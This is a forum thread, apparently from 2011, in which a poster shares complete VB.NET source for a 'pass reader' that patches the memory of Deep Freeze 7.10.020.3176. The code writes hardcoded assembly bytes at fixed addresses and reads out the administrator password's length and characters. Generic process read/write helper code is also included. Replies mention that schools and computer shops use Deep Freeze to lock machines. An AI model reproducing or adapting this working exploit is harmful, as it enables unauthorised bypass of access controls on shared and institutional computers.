Support Forums

Full Version: [Source] Deep Freeze Pass Reader for 7.10.020.3176
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Hello all, this is a video showing how to hack deep freeze password by reading it. I created a simple tool in vb.net to aid or help me reading the valid string character.

Screenshot:
[Image: 99942763.jpg]

Download Video:
Code:
http://www.mediafire.com/?ns4wf7epp31f5h1

Form COdes:
Code:
Public Class Form1
    Public Target As String = "FrzState2k"

    Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
        If GetProcessId(Target) = True Then
            'Check process
            ToolStripStatusLabel2.Text = "Process Found"

            ' Check Version
            TextBoxVersion.Text = ReadString(&H52AE90, 13).ToString
        Else
            ToolStripStatusLabel2.Text = "Process Not Found."
            PatchMemoryAddress.Enabled = False
        End If
    End Sub

    Private Sub Timer2_Tick(sender As System.Object, e As System.EventArgs) Handles Timer2.Tick
        ' Check characters
        TextBoxPassLength.Text = ReadByte(&H51C5EC)
        TextBoxValidString.Text = ReadString(&H51C5F0, 1)
        TextBoxInvalidString.Text = ReadString(&H51C5F4, 1)
    End Sub

    Sub PatchRest0reMemory()
        'Restore Memory
        WriteASM(&H447FE6, New Byte() {&H3B, &H45, &HFC, &H74, &H7})
    End Sub

    Sub PatchAddressMemory()
        'Display Password Length
        WriteASM(&H447FE6, New Byte() {&HE9, &HD, &H46, &HD, 0})
        WriteASM(&H51C5F8, New Byte() {&H3B, &H45, &HFC, &H89, &H5, &HEC, _
                                       &HC5, &H51, &H0, &HF, &H84, &HEB, &HB9, _
                                       &HF2, &HFF, &HE9, &HDF, &HB9, &HF2, &HFF})

        'Display Password Characters
        WriteASM(&H448055, New Byte() {&HE9, &HB3, &H45, &HD, &H0, &H90, &H90, &H90})

        WriteASM(&H51C60D, New Byte() {&H52, &H89, &H15, &HF0, &HC5, &H51, &H0, &HE8, _
                                        &H2F, &HBB, &HFD, &HFF, &H59, &H59, &H89, &HD, &HF4, _
                                        &HC5, &H51, &H0, &HE9, &H37, &HBA, &HF2, &HFF})
    End Sub

    Private Sub PatchMemoryAddress_Click(sender As System.Object, e As System.EventArgs) Handles PatchMemoryAddress.Click
        If TextBoxVersion.Text = "7.10.020.3176" Then
            Call PatchAddressMemory()
            PatchMemoryAddress.Enabled = False
        Else
            Beep()
            MsgBox("Deep Freeze version is not supported", _
                   MsgBoxStyle.Information, "Message")
            Timer1.Enabled = False
            Timer2.Enabled = False
        End If
    End Sub

    Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles Button1.Click
        WriteASM(&H411956, New Byte() {&H90, &H90, &H90, &H90, &H90, &H90})
    End Sub

    Private Sub Button2_Click(sender As System.Object, e As System.EventArgs) Handles Button2.Click
        WriteASM(&H411956, New Byte() {&HF, &H84, &H77, &H1, &H0, &H0})
    End Sub

    Private Sub Timer3_Tick(sender As System.Object, e As System.EventArgs) Handles Timer3.Tick
        
    End Sub
End Class

Module Codes:
Code:
Imports System.ComponentModel

Module MemoryFunctions
    'Some API declarations
    Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flAllocationType As Integer, ByVal flProtect As Integer) As IntPtr
    Declare Function VirtualProtectEx Lib "kernel32.dll" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal newProtect As Integer, ByRef oldProtect As Integer) As Boolean

    Public Declare Function CloseHandle Lib "KERNEL32" _
   (ByVal hObject As Int32) _
   As Boolean

    Public Declare Function GetAsyncKeyState Lib "USER32" _
    (ByVal vKey As Int32) _
    As Int16

    Public Declare Function IsDebuggerPresent Lib "KERNEL32" () As Boolean

    Public Declare Function OpenProcess Lib "KERNEL32" _
    (ByVal DesiredAccess As Int32, _
     ByVal InheritHandle As Boolean, _
     ByVal ProcessId As Int32) _
    As Int32

    Private Declare Function WriteProcessMemory Lib "kernel32" _
    (ByVal Handle As Integer, _
     ByVal address As Integer, _
     ByRef Value As Int32, _
     ByVal Size As Integer, _
     ByRef lpNumberOfBytesWritten As Long) _
    As Long

    Private Declare Function ReadProcessMemory Lib "kernel32" _
    (ByVal Handle As Int32, _
     ByVal address As Int32, _
     ByRef Value As Int32, _
     Optional ByVal Size As Int32 = 4, _
     Optional ByVal lpNumberOfBytesWritten As Int64 = 0) _
    As Integer

    'PROCESS ACCESS RIGHTS.
    Public PROCESS_TERMINATE As Int32 = 1
    Public PROCESS_CREATE_THREAD As Int32 = 2
    Public PROCESS_VM_OPERATION As Int32 = 8
    Public PROCESS_VM_READ As Int32 = 16
    Public PROCESS_VM_WRITE As Int32 = 32
    Public PROCESS_DUP_HANDLE As Int32 = 64
    Public PROCESS_CREATE_PROCESS As Int32 = 128
    Public PROCESS_SET_QUOTA As Int32 = 256
    Public PROCESS_SET_INFORMATION As Int32 = 512
    Public PROCESS_QUERY_INFORMATION As Int32 = 1024
    Public PROCESS_SUSPEND_RESUME As Int32 = 2048
    Public PROCESS_ALL_ACCESS As Int32 = 4091

    'ALLOCATION TYPES.
    Public MEM_COMMIT As Int32 = 4096
    Public MEM_RESERVE As Int32 = 8192
    Public MEM_RESET As Int32 = 524288
    Public MEM_TOP_DOWN As Int32 = 1048576
    Public MEM_PHYSICAL As Int32 = 4194304

    'MEMORY PROTECTION TYPES.
    Public PAGE_NOACCESS As Int32 = 1
    Public PAGE_READONLY As Int32 = 2
    Public PAGE_READWRITE As Int32 = 4
    Public PAGE_WRITECOPY As Int32 = 8
    Public PAGE_EXECUTE As Int32 = 16
    Public PAGE_EXECUTE_READ As Int32 = 32
    Public PAGE_EXECUTE_READWRITE As Int32 = 64
    Public PAGE_EXECUTE_WRITECOPY As Int32 = 128

    Private process_id As Int32 = 0
    Public pHandle As Integer = 0
    Dim FlagValue As Integer

    'Checks to see if the game is running (returns True or False) and sets the pHandle *REQUIRED TO USE*
    Public Function GetProcessId(ByVal game_name As String) As Boolean
        For Each p As Process In Process.GetProcessesByName(game_name)
            process_id = p.Id
            pHandle = OpenProcess(56, False, process_id)
            Return True
        Next
        Return False
    End Function

    'Allocates memory in the process and returns the starting address of the allocated area
    Public Function AllocMem() As Integer
        Dim pBlob As IntPtr = VirtualAllocEx(pHandle, New IntPtr(), New IntPtr(2048), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
        If pBlob = IntPtr.Zero Then
            Return 0
            MsgBox("Error allocating memory space.", MsgBoxStyle.Critical, "Message")
        Else : Return pBlob
        End If
    End Function

    'Changes the protection of the page with the specified starting address to PAGE_EXECUTE_READWRITE
    Sub RemoveProtection(ByVal AddressOfStart As Integer)
        Dim oldProtect As Integer
        If Not VirtualProtectEx(pHandle, New IntPtr(AddressOfStart), New IntPtr(2048), PAGE_EXECUTE_READWRITE, oldProtect) Then Throw New Win32Exception
    End Sub

    'Writes a single byte value
    Public Sub WriteByte(ByVal address As Integer, ByVal Value As Byte)
        WriteProcessMemory(pHandle, address, Value, 1, 0)
    End Sub

    'Writes a 4 bytes value
    Public Sub WriteInt32(ByVal address As Integer, ByVal Value As Int32)
        WriteProcessMemory(pHandle, address, Value, 4, 0)
    End Sub

    'Writes assembly using bytes
    Public Sub WriteASM(ByVal address As Int32, ByVal Value As Byte())
        For i As Integer = LBound(Value) To UBound(Value)
            WriteByte(address + i, Value(i))
        Next
    End Sub

    'Searches for a byte pattern and returns the starting address of it
    Public Function AOBSCAN(ByVal GameName As String, ByVal ModuleName As String, ByVal Signature As Byte()) As Integer
        'To use this, use it like this:
        'Address = AOBSCAN("gamename", "gamename.exe", New Byte () {Bytes go here})
        Dim BaseAddress, EndAddress As Int32
        For Each PM As ProcessModule In Process.GetProcessesByName(GameName)(0).Modules
            If ModuleName = PM.ModuleName Then
                BaseAddress = PM.BaseAddress
                EndAddress = BaseAddress + PM.ModuleMemorySize
            End If
        Next
        Dim curAddr As Int32 = BaseAddress
        Do
            For i As Integer = 0 To Signature.Length - 1
                If ReadByte(curAddr + i) = Signature(i) Then
                    If i = Signature.Length - 1 Then
                        Return curAddr
                    End If
                    Continue For
                End If
                Exit For
            Next
            curAddr += 1
        Loop While curAddr < EndAddress
        Return 0
    End Function

    'Writes to a pointer
    Public Function WritePointer(ByVal Pointer As Int32, ByVal Buffer As Int32, ByVal OffSet() As Int32)
        For Each I As Integer In OffSet
            ReadProcessMemory(pHandle, Pointer, Pointer)
            Pointer += I
        Next
        WriteProcessMemory(pHandle, Pointer, Buffer, 4, 0)
        Return 0
    End Function

    'Adds a value to a pointer
    Public Function WriteAddPointer(ByVal Pointer As Int32, ByVal Buffer As Int32, ByVal OffSet() As Int32)
        For Each I As Integer In OffSet
            ReadProcessMemory(pHandle, Pointer, Pointer)
            Pointer += I
        Next
        WriteProcessMemory(pHandle, Pointer, ReadInt32(Pointer) + Buffer, 4, 0)
        Return 0
    End Function

    'Reads a single byte value and returns it
    Public Function ReadByte(ByVal address As Int32) As Int32
        Dim value As Integer
        ReadProcessMemory(pHandle, address, value, 1, 0)
        Return value
    End Function

    'Reads a 4 bytes value and returns it
    Public Function ReadInt32(ByVal address As Int32) As Int32
        Dim value As Integer
        ReadProcessMemory(pHandle, address, value, 4, 0)
        Return value
    End Function

    'Read String in Memory with char counts
    Public Function ReadString(ByVal Address As Int32, ByVal CharCount As Int32) As String
        Dim ret As Byte() = Nothing
        Dim vBuffer As Long
        Dim tStr(CharCount) As Char
        Dim retStr As String = ""
        For i As Int32 = 0 To CharCount
            ReadProcessMemory(pHandle, Address + i, vBuffer, 1, 0)
            ret = BitConverter.GetBytes(vBuffer)
            tStr(i) = System.Text.Encoding.ASCII.GetString(ret) : retStr += tStr(i)
        Next
        Return retStr
    End Function

    'Reads a pointer value and returns it
    Public Function ReadPointer(ByVal Pointer As Int32, ByRef Buffer As Int32, ByVal OffSet() As Int32)
        For Each I As Integer In OffSet
            ReadProcessMemory(pHandle, Pointer, Pointer)
            Pointer += I
        Next
        ReadProcessMemory(pHandle, Pointer, Buffer)
        Return 0
    End Function

    'Checks to see if the user has the right game version by checking a 4 bytes address value
    Public Function CheckVersion(ByVal AddressToCheck As Integer, ByVal ValueToCheck As Integer) As Boolean
        If ReadInt32(AddressToCheck) = ValueToCheck Then
            Return True
        Else : MsgBox("Version mismatch.", MsgBoxStyle.Critical, "Message")
            Return False
        End If
    End Function

    'Creates a jump from the specified address to a destination address
    Public Function AllocJump(ByVal source As Int32, ByVal destination As Int32, Optional ByVal Nops As Integer = 0) As Boolean
        WriteByte(source, &HE8)
        WriteInt32(source + 1, destination - source - 5)
        If Nops = 0 Then
            Return 0
        End If
        For i As Int32 = 1 To Nops
            WriteByte(source + 4 + i, &H90)
        Next
        Return 0
    End Function

End Module

Screenshot in IDE:
[Image: MYWwQ.png]

Download Executable:
Code:
http://www.mediafire.com/?ns4wf7epp31f5h1

An another rare release of mine. Hoping, that this post didn't violate rules coz I thought this would helps other people, regarding memory read/write.
Deep freeze is a game? The source looks interesting. And I'm not sure that this would necessarily constitute as hacking, but use words like 'recover' password. Good share.
(05-17-2011, 10:10 AM)KoBE Wrote: [ -> ]Deep freeze is a game? The source looks interesting. And I'm not sure that this would necessarily constitute as hacking, but use words like 'recover' password. Good share.

Deep freeze is a tool that deletes any data at the end of a users session. Some schools use it to help stop the spread of viruses.
(05-17-2011, 10:10 AM)KoBE Wrote: [ -> ]Deep freeze is a game? The source looks interesting. And I'm not sure that this would necessarily constitute as hacking, but use words like 'recover' password. Good share.

In most cases to other people this is considered as hacking, some of computer shops here uses deep freeze software to lock their system.
(05-17-2011, 10:10 AM)KoBE Wrote: [ -> ]Deep freeze is a game? The source looks interesting. And I'm not sure that this would necessarily constitute as hacking, but use words like 'recover' password. Good share.
Deep Freeze is same as Shadow Defender it "Freeze" your computer so that any Downloaded/Installed Applications or any effect on System will be wiped off after Computer restart
Good for testing malwares Oui
Lol first comment was so hilarious , xD .hahaha . Deep Freeze is mainly used on Computer Shops / Computer Cafe's .

Btw thanks for the Share OP Smile. This will be useful.
Dear OP, can you upload the whole source code? Thanks in advanced.